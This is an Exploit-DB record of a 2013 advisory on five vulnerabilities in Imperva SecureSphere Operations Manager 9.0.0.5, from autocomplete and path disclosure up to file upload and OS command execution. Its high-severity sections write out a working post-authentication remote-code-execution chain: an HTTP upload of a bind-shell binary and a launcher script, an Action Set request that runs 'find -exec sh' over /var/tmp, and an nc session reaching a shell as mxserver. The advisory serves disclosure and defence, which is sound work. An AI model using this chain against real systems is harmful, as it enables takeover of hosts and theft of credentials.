{"id": "EDB-ID:25977", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "Imperva SecureSphere Operations Manager 9.0.0.5 - Multiple Vulnerabilities", "description": "", "published": "2013-06-05T00:00:00", "modified": "2013-06-05T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/25977", "reporter": "Pedro Andujar", "references": [], "cvelist": ["2013-4091", "2013-4092", "2013-4093", "2013-4094", "2013-4095"], "immutableFields": [], "lastseen": "2022-08-16T08:44:46", "viewCount": 18, "enchantments": {"dependencies": {}, "score": {"value": 0.6, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.6}, "_state": {"dependencies": 1661190352, "score": 1661184847, "epss": 1678800746}, "_internal": {"score_hash": "58e234e6c86a78efcd43e1f671a5955c"}, "sourceHref": "https://www.exploit-db.com/download/25977", "sourceData": "Original: http://www.digitalsec.net/stuff/explt+advs/Imperva-SecureSphere.OptMgr.txt\r\n\r\n\r\n ===============================\r\n - Advisory -\r\n ===============================\r\n\r\n Title: Imperva SecureSphere Operations Manager - Command\r\nExecution (Post Authentication) & Minor issues\r\n Risk: High\r\n Date: 27.May.2013\r\n Author: Pedro Andujar\r\n\r\n\r\n.: [ INTRO ] :.\r\n\r\nSecureSphere Operations Manager (SOM) is a multi-domain, federated\r\nmanagement solution that dramatically improves the operational\r\nefficiency of managing SecureSphere deployments with multiple MX\r\nManagement Servers. 
SOM meets the operational scalability\r\ndemands of large enterprises and Managed Security Service Providers by\r\nconsolidating the management, visibility and reporting\r\nacross multiple SecureSphere MX Management Servers, and provides\r\nsystem wide health metrics and statistics.\r\n\r\n\r\n.: [ TECHNICAL DESCRIPTION ] :.\r\n\r\nImperva SecureSphere Operations Manager version 9.0.0.5 Enterprise\r\nEdition and probably others are prone to several security issues\r\nas described below:\r\n\r\n\r\n.: [ ISSUE #1 ] :.\r\n\r\nName: Autocomplete attribute not disabled in login page\r\nSeverity: Low\r\n\r\nAUTOCOMPLETE is not disabled on the /secsphLogin.jsp page. This\r\ndoes not prevent the web browser from caching the username and\r\nj_password fields.\r\n\r\n<tr> <td style=\"width: 120px\"> <h1 class=\"login\">User:</h1> </td> <td>\r\n<input size=30 id=\"username\" type='text' name='j_username'\r\nstyle=\"width:172px\" value=\"andujarp\" />\r\n<script>document.getElementById(\"username\").focus()</script>\r\n</td> </tr> <tr>\r\n<td style=\"width: 120px\">\r\n<h1 class=\"login\">Password:</h1>\r\n</td> <td>\r\n<input size=30 type='password' name='j_password' style=\"width:172px\"/>\r\n\r\n\r\n.: [ ISSUE #2 ] :.\r\n\r\nName: Sensitive information is passed as parameter in URL\r\nSeverity: Low\r\n\r\nAs part of the login process, the assigned session ID is revealed as a\r\nURL parameter.\r\n\r\nGET /SecureSphere/secsphLogin.jsp;jsessionid=8B4AE9F3C99049824D4AEBBF61DEF6A5\r\nHTTP/1.1\r\n\r\n\r\nAdditionally, some credentials are revealed as a URL parameter\r\nwhen trying to get the details of a sensor device:\r\n\r\nGET /SecureSphere/j_acegi_security_check?j_password=5352023200062562773&j_username=SOM-user&remote_login_attempt=true&active_mom_user=andujarp\r\n\r\n\r\n\r\n.: [ ISSUE #3 ] :.\r\n\r\nName: Physical Path Disclosure\r\nSeverity: Low\r\n\r\nThe SecureSphere web application discloses sensitive system\r\ninformation, including file path information, through its 
exposed\r\nfunctionality.\r\nSpecifically, the\r\n/SecureSphere/dwr/call/plaincall/AsyncOperationsContainer.getOperationState.dwr\r\nURL resource shows the internal\r\nroot path of the underlying Application Server:\r\n\r\nHTTP/1.1 200 OK\r\nContent-type: text/javascript;charset=utf-8\r\nContent-Length: 554\r\nDate: Thu, 25 Oct 2013 04:41:38 GMT\r\nServer: NA\r\n\r\nthrow 'allowScriptTagRemoting is false.';\r\n//#DWR-INSERT\r\n//#DWR-REPLY\r\nvar s0={};var s1=[];s0['file_size']=\"412\r\nKB\";s0.filePath=\"/opt/SecureSphere/server/SecureSphere/jakarta-tomcat-secsph/webapps/SecureSphere/WEB-INF/reptempt/25CB2F79E342E89AD9A7CFF51AA17F10/1338152502622932642/export.imf\"\r\n\r\nSee also ISSUE #4, where additional file path disclosure occurs.\r\n\r\n\r\n\r\n.: [ ISSUE #4 ] :.\r\n\r\nName: Insufficient checks on file upload\r\nSeverity: High\r\n\r\nThe SecureSphere web application file upload functionality from the\r\n'Key Management' section doesn't provide an adequate security control\r\nof the uploaded\r\nfiles, thus allowing an external attacker to upload arbitrary content\r\ninto the server. This can be used by an attacker in combination with\r\nadditional\r\nvulnerabilities in the application to compromise the Host.\r\n\r\nWhen trying to upload an invalid file in the Key Management section,\r\nthe application shows the full internal path of the application\r\nserver. Additionally,\r\nit effectively uploads the file, despite being a wrong filetype.\r\n\r\nThe example below shows the file upload functionality outputting an\r\nerror when the file gets uploaded, additionally revealing the upload\r\nfilename and its\r\ninternal path within the system. 
A Linux x86_64 ELF port 2222 bind\r\nshell and additional shell script are uploaded to /var/tmp dir:\r\n\r\n\r\nPOST /SecureSphere/plain/settings.html?__targetView=details&extraParams[Key]=T/keyManagement\r\nHTTP/1.1\r\nHost: x.x.x.x:8083\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nConnection: keep-alive\r\nReferer: https://x.x.x.x:8083/SecureSphere/ui/main.html\r\nCookie: JSESSIONID=CBAD5B77716363AFC961614AC32CAD4D\r\nContent-Type: multipart/form-data;\r\nboundary=---------------------------6997088307399657971245517506\r\nContent-Length: 1011\r\n-----------------------------6997088307399657971245517506\r\nContent-Disposition: form-data; name=\"def_name\"\r\ndefault_key_pair_fips_2\r\n-----------------------------6997088307399657971245517506\r\nContent-Disposition: form-data; name=\"private_key\"; filename=\"bndsh\"\r\nContent-Type: application/octet-stream\r\nELF > x@@@8 @@$ j)Xj _j ^HR $ ziHj Zj1Xj2XH1j+XHj ^Hj!Xuj;XH/bin/shSHRWH\r\n-----------------------------6997088307399657971245517506\r\nContent-Disposition: form-data; name=\"public_key\"; filename=\"script\"\r\nContent-Type: application/octet-stream\r\nfile file* | grep ELF | awk '{print $1}' | sed -e 's/://' >target.file\r\n; chmod 755 `cat target.file` ; ./`cat target.file` ; rm -rf\r\ntarget.file\r\n-----------------------------6997088307399657971245517506\r\nContent-Disposition: form-data; name=\"password\"\r\n12321323\r\n-----------------------------6997088307399657971245517506----------------------------------------------------\r\n\r\n\r\n\r\nHTTP/1.1 200 OK\r\nPragma: no-cache\r\nExpires: Thu, 01 Jan 1970 00:00:00 GMT\r\nCache-Control: no-cache\r\nCache-Control: no-store\r\nContent-Type: text/xml;charset=UTF-8\r\nContent-Language: en\r\nContent-Length: 315\r\nDate: Fri, 26 Oct 2012 04:38:17 GMT\r\nServer: 
NA\r\n<errors> <global-errors> <global-error path=\"page\">\r\nAn error occurred while importing keys: Failed to load PEM key from\r\n'/var/tmp/com.mprv.secsph.utils.io1217840423292804321upload.file'..</global-error>\r\n</global-errors> <field-errors> </field-errors> </errors>\r\n\r\n\r\n\r\n.: [ ISSUE #5 ] :.\r\n\r\nName: Insufficient checks on Action Set (OS command)\r\nSeverity: High\r\n\r\nThe SecureSphere web application allows users to create Action Sets\r\nvia the Policies sub menu. Action Sets are components used to define\r\nthe actions taken\r\nby SecureSphere when specific conditions are met. Action sets include\r\nsession blocks, SNMP traps, system logs, email, FTP Archive, OS\r\nCommand, etc. An\r\nattacker can control the execution of commands by creating a task,\r\nsetting an OS command action on assignee change and cycling through\r\ncommands by continuous\r\nmodification of the task assignee. The OS command action allows the\r\nuser to supply very limited commands and arguments to the server host\r\nand have these\r\ncommands executed within the context of the 'mxserver' user. The\r\napplication host is running a modified version of Red Hat Linux, with\r\nmany networking and\r\nscripting tools installed by default. Due to insufficient host\r\nhardening and application sandboxing, an attacker is able to execute\r\ncommands. Combined with the\r\nfile upload vulnerability explained in issue 4, an attacker can copy a\r\nbackdoor into the server filesystem and get it executed through this\r\nissue, opening\r\nshell access to the host as the 'mxserver' user. 
The attacker is able\r\nto use this foothold into the host to elevate privileges, view and\r\nmodify source code,\r\nobtain system and application credentials, etc.\r\n\r\n\r\nPOST /SecureSphere/plain/actionsets.html HTTP/1.1\r\nHost: x.x.x.x:8083\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0\r\nAccept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nConnection: keep-alive\r\nX-Requested-With: XMLHttpRequest\r\nX-Prototype-Version: 1.4.0\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\npreffered_encoding: utf-8\r\nReferer: https://x.x.x.x:8083/SecureSphere/ui/main.html\r\nContent-Length: 5223\r\nCookie: JSESSIONID=ABD89957C38AD685A881670E31A7BF1A\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n__targetView=details¤tState=E/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\0x5D&data[actionsets][/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\0x5D].momSettingsComponent.addToNewMxs=true\r\n&data[actionsets][/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\0x5D].actions.map[5143764432078707607].actionInterface=E/secsph/action-interface\\0x5B@dn=\\0x27OsCommandAI\\0x27\\0x5D\r\n&data[actionsets][/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\0x5D].actions.map[5143764432078707607].name=rvshell&data[actionsets][/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\0x5D].actions.map\r\n[5143764432078707607].actionParams.ownerTable=E/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\0x5D,actions.map[5143764432078707607]&data[actionsets][/secsph/action-set\\0x5B@dn=\\0x271914115513\\\r\n0x27\\0x5D].actions.map[5143764432078707607].actionParams.parameters.map\r\n\r\n[command].value=/usr/bin/find\r\n\r\n&data[actionsets][/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[command].ownerTable=E/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\0x5D,\r\nac
tions.map[5143764432078707607].actionParams&data[actionsets][/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[command]\r\n.parameterMetadata=E/secsph/generic-action-interface-metadata\\0x5B@dn=\\0x27OsCommand\\0x27\\0x5D,interfaceParameters.map[command]&data[actionsets][/secsph/action-set\\0x5B@dn=\\0x271914115513\\\r\n0x27\\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[command].name=command&data[actionsets][/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\0x5D].actions.map\r\n[5143764432078707607].actionParams.parameters.map\r\n\r\n[arguments].value=-name file\\* -exec sh {} \\;\r\n\r\n&data[actionsets][/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[arguments].ownerTable=E/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\\r\n0x5D,actions.map[5143764432078707607].actionParams&data[actionsets][/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[arguments]\r\n.parameterMetadata=E/secsph/generic-action-interface-metadata\\0x5B@dn=\\0x27OsCommand\\0x27\\0x5D,interfaceParameters.map[arguments]&data[actionsets][/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\\r\n0x5D].actions.map[5143764432078707607].actionParams.parameters.map[arguments].name=arguments&data[actionsets][/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\0x5D].actions.map[5143764432078707607].actionParams.parameters.map\r\n\r\n[workingDir].value=/var/tmp\r\n\r\n&data[actionsets][/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[workingDir].ownerTable=E/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\0x5D,actions.map[5143764432078707607].actionParams&data\r\n[actionsets][/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[workingDir].p
arameterMetadata=E/secsph/generic-action-interface-metadata\\0x5B\r\n@dn=\\0x27OsCommand\\0x27\\0x5D,interfaceParameters.map[workingDir]&data[actionsets][/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[workingDir]\r\n.name=workingDir&data[actionsets][/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[shouldRunAlways].value=true&data[actionsets][/secsph/action-set\\0x5B\r\n@dn=\\0x271914115513\\0x27\\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[shouldRunAlways].ownerTable=E/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\0x5D,actions\r\n.map[5143764432078707607].actionParams&data[actionsets][/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[shouldRunAlways]\r\n.parameterMetadata=E/secsph/generic-action-interface-metadata\\0x5B@dn=\\0x27OsCommand\\0x27\\0x5D,interfaceParameters.map[shouldRunAlways]&data[actionsets][/secsph/action-set\\0x5B@dn=\r\n\\0x271914115513\\0x27\\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[shouldRunAlways].name=shouldRunAlways&data[actionsets][/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\0x5D]\r\n.actions.map[5143764432078707607].ownerTable=E/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\0x5D&_=\r\n\r\n\r\nIn the example above, we have set an event action-set, and as soon as the\r\nevent happens it will launch the predefined action (/usr/bin/find .\r\n-exec sh {})\r\nwhich will execute sh over all the files existing in /var/tmp. 
As we\r\nwere able to upload arbitrary content within the local filesystem by\r\nmeans of\r\nissue 4, the following script that was previously uploaded will be\r\nexecuted as well:\r\n\r\nfile file* | grep ELF | awk '{print $1}' | sed -e 's/://' >target.file\r\n; chmod 755 `cat target.file` ; ./`cat target.file` ; rm -rf\r\ntarget.file\r\n\r\nThe script will find, rename and execute the bind TCP shell that was\r\nuploaded before, giving us access to an interactive Linux\r\nshell on port 2222,\r\nwith the privileges of mxserver.\r\n\r\n\r\n[crg@fogheaven ~]$ nc x.x.x.x 2222\r\nuname -a;id\r\nLinux xxxxx.xxxx.xx 2.6.18-164.15.1.el5.impl #1 SMP Tue Apr 27\r\n20:46:55 IDT 2010 x86_64 x86_64 x86_64 GNU/Linux\r\nuid=502(mxserver)gid=505(mxserver)groups=505(mxservers)\r\n\r\n\r\n\r\n\r\n.: [ CHANGELOG ] :.\r\n\r\n * 25/Oct/2012: - Audit done, reported to client.\r\n * 27/May/2013: - Sent to Imperva.\r\n * 02/Jun/2013: - Public Disclosure.\r\n\r\n.: [ SOLUTIONS ] :.\r\n\r\nN/A\r\n\r\n\r\n.: [ REFERENCES ] :.\r\n\r\n [+] Imperva SecureSphere Operations Manager\r\n http://www.imperva.com/products/mgt_operations-manager.html\r\n\r\n [+] Security Target Document\r\n http://www.niap-ccevs.org/st/st_vid10466-st.pdf\r\n\r\n [+] Ernst & Young Advanced Security Centre - Melbourne\r\n http://www.ey.com/security/\r\n\r\n [+] !dSR - Digital Security Research\r\n http://www.digitalsec.net/\r\n\r\n\r\n\r\n\r\n -=EOF=-", "osvdbidlist": ["93827", "93826", "93825", "93824", "93823"], "exploitType": "webapps", "verified": false}